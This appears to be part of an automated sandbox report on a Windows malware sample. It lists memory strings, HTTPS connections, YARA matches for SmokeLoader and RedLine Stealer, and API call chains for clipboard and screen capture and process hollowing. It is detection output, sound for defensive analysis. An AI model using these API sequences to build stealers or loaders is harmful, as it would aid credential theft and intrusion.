Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org
Source: GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_0042EAB0

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_0042EAB0

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

5_2_0042EC90

Source: Yara match	File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401615
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401658
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA,	0_2_00403406
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401620
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401524
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040162D
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401635
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401615
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401658
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00403406 NtTerminateProcess,GetModuleHandleA,	4_2_00403406
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401620
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401524
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040162D
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401635
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Code function: 8_2_043B9B10 NtProtectVirtualMemory,NtProtectVirtualMemory,	8_2_043B9B10
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	8_2_043BA4F0
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Code function: 8_2_043B9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	8_2_043B9850

Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00427353	5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_004016E0	5_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00420880	5_2_00420880
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00404970	5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0041FD10	5_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0043B050	5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00426174	5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_004061F0	5_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00426284	5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_004223B8	5_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00405440	5_2_00405440
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0040F400	5_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_004164D2	5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00433480	5_2_00433480
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00403570	5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00421580	5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_004067B0	5_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_004089A0	5_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00424B80	5_2_00424B80
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00421C71	5_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00425CEE	5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00440D36	5_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0043AD30	5_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00407DF0	5_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00404EF0	5_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00435EB0	5_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00632067	5_2_00632067
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00618057	5_2_00618057
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00615157	5_2_00615157
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00646117	5_2_00646117
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00611267	5_2_00611267
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0064B2B7	5_2_0064B2B7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_006363DB	5_2_006363DB
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00616457	5_2_00616457
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_006364EB	5_2_006364EB
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_006375BA	5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0061F667	5_2_0061F667
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_006436E7	5_2_006436E7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_006156A7	5_2_006156A7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00626739	5_2_00626739
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_006137D7	5_2_006137D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00616A17	5_2_00616A17
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00630AE7	5_2_00630AE7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00614BD7	5_2_00614BD7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00618C07	5_2_00618C07
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00635F55	5_2_00635F55
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0064AF97	5_2_0064AF97
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Code function: 8_2_043BAB10	8_2_043BAB10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC2ECC0	9_2_6CC2ECC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC8ECD0	9_2_6CC8ECD0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC3AC60	9_2_6CC3AC60
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCF6C00	9_2_6CCF6C00
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD0AC30	9_2_6CD0AC30
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CDBCDC0	9_2_6CDBCDC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCC6D90	9_2_6CCC6D90
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC34DB0	9_2_6CC34DB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD5AD50	9_2_6CD5AD50
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCFED70	9_2_6CCFED70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CDB8D20	9_2_6CDB8D20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC3AEC0	9_2_6CC3AEC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCD0EC0	9_2_6CCD0EC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCB6E90	9_2_6CCB6E90
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCCEE70	9_2_6CCCEE70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD10E20	9_2_6CD10E20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD0EFF0	9_2_6CD0EFF0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC30FE0	9_2_6CC30FE0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD78FB0	9_2_6CD78FB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC3EFB0	9_2_6CC3EFB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC9EF40	9_2_6CC9EF40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCF2F70	9_2_6CCF2F70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC36F10	9_2_6CC36F10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD70F20	9_2_6CD70F20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD1C8C0	9_2_6CD1C8C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD368E0	9_2_6CD368E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD04840	9_2_6CD04840
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC80820	9_2_6CC80820
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCBA820	9_2_6CCBA820
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD4C9E0	9_2_6CD4C9E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC649F0	9_2_6CC649F0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCC09A0	9_2_6CCC09A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCEA9A0	9_2_6CCEA9A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCF09B0	9_2_6CCF09B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC68960	9_2_6CC68960
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC86900	9_2_6CC86900
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCAEA80	9_2_6CCAEA80
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCACA70	9_2_6CCACA70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCDEA00	9_2_6CCDEA00
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCE8A30	9_2_6CCE8A30
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD36BE0	9_2_6CD36BE0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCD0BA0	9_2_6CCD0BA0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC764D0	9_2_6CC764D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCCA4D0	9_2_6CCCA4D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD5A480	9_2_6CD5A480
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC48460	9_2_6CC48460
